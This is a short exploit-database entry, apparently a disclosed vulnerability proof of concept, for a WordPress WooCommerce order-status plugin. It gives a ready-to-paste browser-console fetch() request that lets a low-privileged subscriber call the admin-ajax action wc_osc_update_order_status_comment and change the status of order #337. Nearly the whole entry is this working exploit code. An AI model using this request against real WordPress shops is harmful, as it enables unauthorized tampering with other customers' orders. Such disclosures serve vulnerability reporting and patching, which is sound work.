Share
## https://sploitus.com/exploit?id=WPEX-ID:FBC56973-4225-4F44-8C38-D488E57CD551
Run the below command in the developer console of the web browser while being logged in as a subscriber, this will change the status of the order #337 to processing

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wc_osc_update_order_status_comment&method=change_status&order_id=337&status=processing',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));